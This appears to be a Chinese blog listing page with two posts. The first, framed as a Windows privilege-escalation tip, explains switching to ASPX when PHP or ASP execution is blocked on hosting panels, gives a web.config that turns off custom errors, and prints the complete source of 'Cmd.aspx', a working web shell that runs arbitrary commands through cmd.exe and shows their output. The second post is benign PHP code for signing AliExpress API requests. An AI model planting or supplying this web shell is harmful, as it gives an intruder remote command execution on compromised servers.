分类 日常生活 下的文章

分享一个Windows提权小技巧


当我们遇到Windows的提权的时候
php有时候安全模式执行不了
我们可以尝试asp来执行
但是如果asp也不支持的话 就可以试试net
因为现在的服务器大部分都是集成环境
例如宝塔 PHPstudy 或者护卫神
除了phpstudy的话 另外两个很大几率都是支持aspx的
但是遇到aspx无法编译的时候 可以在根目录创建一个web.config文件来试试

<!-- Web.Config 配置文件 -->

<configuration>
    <system.web>
        <customErrors mode="Off"/>
    </system.web>
</configuration>

aspx cmd文件

<%@ Page Language="C#" AutoEventWireup="true"%>
<%@ import Namespace="System.Diagnostics"%>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<script runat="server" language="C#">
    protected void Page_Load(object sender, EventArgs e)
    {
        if(!IsPostBack) curdir.Text = Server.MapPath(".");
    }
    protected string RunCmd(string path, string cmd, string curdir)
    {
        string retval = "";

        try
        {
            Process p = new Process();
            p.StartInfo.FileName = path;
            p.StartInfo.UseShellExecute = false;
            p.StartInfo.WorkingDirectory = curdir;
            p.StartInfo.RedirectStandardError = true;
            p.StartInfo.RedirectStandardInput = true;
            p.StartInfo.RedirectStandardOutput = true;
            p.StartInfo.CreateNoWindow = true;
            p.StartInfo.Arguments = cmd;
            p.Start();
            p.StandardInput.WriteLine("exit");
            retval = "rn----------- 运行结果 --------------rn";
            retval += p.StandardOutput.ReadToEnd();
            retval += "rn----------- 程序错误 --------------rn";
            retval += p.StandardError.ReadToEnd();
        }
        catch (Exception err)
        {
            retval = err.Message;
        }

        return retval;
    }
    protected void Execute_Click(object sender, EventArgs e)
    {
        string path = cmdpath.Text;
        string cmd = cmdline.Text;
        string wkdir = curdir.Text;

        result.Text = RunCmd(path, cmd, wkdir);
    }
    
</script>
<html xmlns="http://www.w3.org/1999/xhtml"; >
<head runat="server">
    <title>剑眉大侠 and Cmd.aspx</title>
</head>
<body>
    <form id="form1" runat="server">
    <div style="text-align: left">
        <span style="color: #ff99ff">Cmd.aspx powered by 剑眉大侠

</span>CMD Path:<asp:TextBox ID="cmdpath" runat="server" Width="755px">c:windowssystem32cmd.exe</asp:TextBox>
CurrentDir:<asp:TextBox ID="curdir" runat="server" Width="755px"></asp:TextBox>
CMD Line:<asp:TextBox ID="cmdline" runat="server" Width="756px">/c set</asp:TextBox> <asp:Button ID="Execute" runat="server" OnClick="Execute_Click" Text="Execute" />

<asp:TextBox ID="result" runat="server" Height="460px" TextMode="MultiLine" Width="901px"></asp:TextBox></div> </form> </body> </html>

速卖通API接口签名算法[订单url生成]


<?php
    $orderid1 = $_GET['order'];
    $token1 = $_GET['token'];
    $url = 'http://gw.api.alibaba.com:80/openapi';//1688开放平台使用gw.open.1688.com域名
    $appKey = '填写appkey';
    $appSecret ='写签名串'; //签名串
    $orderid = $orderid1;// 订单号
    $token = $token1;//授权码
    $apiInfo = 'param2/1/aliexpress.open/api.findOrderById/' . $appKey;//此处请用具体api进行替换
    
        
    //配置参数,请用apiInfo对应的api参数进行替换
    $code_arr = array(
        // 'client_id'=>$appKey,
        'orderId' => $orderid,
        'access_token' => $token,
    );
    $aliParams = array();
    foreach ($code_arr as $key => $val) {
        $aliParams[] = $key . $val;
    }
    // print_r($aliParams);die;
    sort($aliParams);
    $sign_str = join('', $aliParams);
    $sign_str = $apiInfo . $sign_str; //拼接参数
    $code_sign = strtoupper(bin2hex(hash_hmac("sha1", $sign_str, $appSecret, true))); //签名算法
    $file_get_url = "{$url}/{$apiInfo}?orderId={$orderid}&access_token={$token}&_aop_signature={$code_sign}";
    if (!empty($file_get_url)) {
        $content = file_get_contents($file_get_url);
        $b = json_decode($content,TRUE);
        // print_r($b);die;
        
    }

?>